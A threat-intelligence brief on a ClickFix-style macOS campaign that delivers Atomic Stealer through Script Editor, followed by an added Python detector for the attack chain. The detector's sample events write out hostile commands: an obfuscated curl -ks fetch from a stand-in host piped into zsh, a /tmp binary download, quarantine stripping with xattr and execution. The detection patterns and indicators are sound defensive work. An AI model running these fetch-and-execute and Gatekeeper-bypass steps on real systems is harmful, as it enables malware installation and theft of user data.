A newly observed ClickFix-style macOS attack replaces Terminal-based execution with macOS Script Editor and a browser-triggered applescript:// workflow to evade Terminal-focused defenses. The campaign uses an obfuscated staged delivery that downloads and runs a Mach-O binary, ultimately installing a variant of Atomic Stealer. #ClickFix #AtomicStealer
Key points
- Attackers moved from Terminal paste attacks to using macOS Script Editor invoked via an Apple-themed webpage and the applescript:// URL scheme.
- The webpage presents a pre-filled script that appears to be a cleanup tool but contains an obfuscated shell command.
- The initial script decodes a hidden URL with tr, fetches the next stage with curl -k (TLS certificate verification disabled), and pipes the response into zsh so it runs without ever being written to disk.
- A second-stage script downloads a Mach-O binary to /tmp, strips its extended attributes (including the quarantine flag Gatekeeper relies on), sets the execute bit, and launches a variant of Atomic Stealer.
- Indicators include domains dryvecar[.]com, storage-fixes.squarespace[.]com, cleanupmac.mssg[.]me and the helper SHA256 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44.
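The two stages above give a defender two correlatable signals: a scripting host (Script Editor or osascript) spawning a shell that curl -k's something straight into another shell, and a file whose quarantine attribute is stripped, made executable and then run within a short window. The detection below is an added example, not code from the article or from any vendor; the event feed layout, the process names, the ROT13-style tr ranges and the example.net URL are all constructed assumptions, and the tr decoder generalizes to any single echo | tr substitution, not just the one the campaign used.

```python
"""Detect the Script Editor -> shell -> curl -k | zsh -> /tmp Mach-O chain.

Added example; the telemetry format and every sample line are constructed."""
import os
import re
from datetime import datetime

# Constructed sample telemetry resembling a generic EDR process-event feed.
SAMPLE_EVENTS = [
    # Stage 1: Script Editor runs a shell that decodes a URL with tr (ROT13
    # ranges are an assumption), fetches it with curl -k and pipes it into zsh.
    {"ts": "2025-01-01T10:00:00", "pid": 501, "ppid": 120,
     "parent": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "image": "/bin/sh",
     "cmd": "sh -c u=$(echo 'uggcf://rknzcyr.arg/fgntr' | tr 'A-Za-z' 'N-ZA-Mn-za-m'); curl -ks \"$u\" | zsh"},
    # Stage 2: drop a binary in /tmp, strip quarantine, mark executable, run it.
    {"ts": "2025-01-01T10:00:03", "pid": 502, "ppid": 501, "parent": "/bin/sh",
     "image": "/usr/bin/curl", "cmd": "curl -ks https://example.net/helper -o /tmp/helper"},
    {"ts": "2025-01-01T10:00:04", "pid": 503, "ppid": 501, "parent": "/bin/sh",
     "image": "/usr/bin/xattr", "cmd": "xattr -c /tmp/helper"},
    {"ts": "2025-01-01T10:00:04", "pid": 504, "ppid": 501, "parent": "/bin/sh",
     "image": "/bin/chmod", "cmd": "chmod +x /tmp/helper"},
    {"ts": "2025-01-01T10:00:05", "pid": 505, "ppid": 501, "parent": "/bin/sh",
     "image": "/tmp/helper", "cmd": "/tmp/helper"},
    # Benign noise: a developer clears quarantine on a build artifact that is never executed.
    {"ts": "2025-01-01T11:00:00", "pid": 601, "ppid": 300,
     "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/usr/bin/xattr", "cmd": "xattr -d com.apple.quarantine /Users/dev/src/tool"},
]

SCRIPT_HOSTS = {"Script Editor", "osascript"}
# Heuristics: curl with -k (possibly bundled, e.g. -ks) or --insecure before any pipe,
# and a pipe whose consumer is a shell.
INSECURE_CURL = re.compile(r"\bcurl\b[^|]*(\s-[a-zA-Z]*k|\s--insecure\b)")
PIPE_TO_SHELL = re.compile(r"\|\s*(zsh|bash|sh)\b")
QUARANTINE_STRIP = re.compile(r"\bxattr\b.*\s(-[a-z]*c[a-z]*|-d\s+com\.apple\.quarantine)\s+(\S+)")
CHMOD_EXEC = re.compile(r"\bchmod\b.*\s(\+x|[0-7]*[1357][0-7]{2})\s+(\S+)")
TR_ECHO = re.compile(r"echo\s+'([^']*)'\s*\|\s*tr\s+'([^']*)'\s+'([^']*)'")


def _expand(spec):
    """Expand a tr character set such as 'A-Za-z' into its literal characters."""
    out, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            out.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            out.append(spec[i])
            i += 1
    return "".join(out)


def decode_tr_echo(cmd):
    """Reverse an `echo 'x' | tr 'set1' 'set2'` substitution in cmd; None if absent."""
    m = TR_ECHO.search(cmd)
    if not m:
        return None
    text, s1, s2 = m.group(1), _expand(m.group(2)), _expand(m.group(3))
    s2 = (s2 + s2[-1] * len(s1))[: len(s1)]  # tr pads set2 with its last char
    return text.translate(str.maketrans(s1, s2))


def detect(events, window_s=120):
    """Return alerts for the two stages, correlating strip/chmod/exec per path."""
    alerts, staged = [], {}  # staged: path -> {"xattr": ts, "chmod": ts}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, cmd = datetime.fromisoformat(ev["ts"]), ev["cmd"]
        # Rule 1: scripting host spawns a shell that pipes an insecure curl into a shell.
        if (os.path.basename(ev["parent"]) in SCRIPT_HOSTS
                and INSECURE_CURL.search(cmd) and PIPE_TO_SHELL.search(cmd)):
            alerts.append({"rule": "script_editor_curl_pipe_shell", "pid": ev["pid"],
                           "decoded_url": decode_tr_echo(cmd)})
        m = QUARANTINE_STRIP.search(cmd)
        if m:
            staged.setdefault(m.group(2), {})["xattr"] = ts
        m = CHMOD_EXEC.search(cmd)
        if m:
            staged.setdefault(m.group(2), {})["chmod"] = ts
        # Rule 2: a path that was de-quarantined and chmod'ed is executed within the window.
        st = staged.get(ev["image"])
        if st and "xattr" in st and "chmod" in st \
                and (ts - min(st.values())).total_seconds() <= window_s:
            alerts.append({"rule": "quarantine_stripped_then_executed",
                           "pid": ev["pid"], "path": ev["image"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

Rule 2 deliberately keys on the file path rather than on /tmp alone, so a stager that drops into ~/Library or /private/var/folders is still caught; the benign xattr -d on a developer's build artifact produces no alert because it is never followed by a chmod and an execution of the same path.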
Read More: https://thecyberexpress.com/clickfix-style-macos-attack/